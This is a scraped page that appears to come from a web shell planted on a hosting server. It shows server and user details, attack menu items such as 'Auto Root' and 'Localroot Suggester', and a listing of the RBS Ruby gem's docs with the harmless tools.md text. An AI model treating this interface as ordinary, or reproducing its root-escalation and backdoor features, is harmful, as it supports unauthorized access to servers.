Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
gems /
gems /
rbs-3.8.0 /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
CONTRIBUTING.md
3.92
KB
-rw-r--r--
2026-04-07 16:50
architecture.md
4.74
KB
-rw-r--r--
2026-04-07 16:50
collection.md
5.29
KB
-rw-r--r--
2026-04-07 16:50
data_and_struct.md
3.06
KB
-rw-r--r--
2026-04-07 16:50
gem.md
2.76
KB
-rw-r--r--
2026-04-07 16:50
rbs_by_example.md
7.15
KB
-rw-r--r--
2026-04-07 16:50
repo.md
4.44
KB
-rw-r--r--
2026-04-07 16:50
sigs.md
5.33
KB
-rw-r--r--
2026-04-07 16:50
stdlib.md
5.6
KB
-rw-r--r--
2026-04-07 16:50
syntax.md
28.08
KB
-rw-r--r--
2026-04-07 16:50
tools.md
819
B
-rw-r--r--
2026-04-07 16:50
Save
Rename
# Tools This documentation describes major tools related to RBS. They are listed alphabetically. ## Type Checkers * [Steep](https://github.com/soutaro/steep) is a static type checker based on RBS. You can use it as a language server integrated with an editor or IDE and run it from the command line. * [TypeProf](https://github.com/ruby/typeprof) ## Editor integrations * Emacs: [rbs-mode](https://github.com/ybiquitous/rbs-mode) * RubyMine: [It supports RBS by default](https://www.jetbrains.com/help/ruby/rbs.html) * Sublime Text: [sublime-rbs-plugin](https://github.com/soutaro/sublime-rbs-plugin) * Vim: [rbs.vim](https://github.com/pocke/rbs.vim) * Visual Studio Code: [vscode-rbs-syntax](https://github.com/soutaro/vscode-rbs-syntax) * NeoVim: [tree-sitter-rbs](https://github.com/joker1007/tree-sitter-rbs)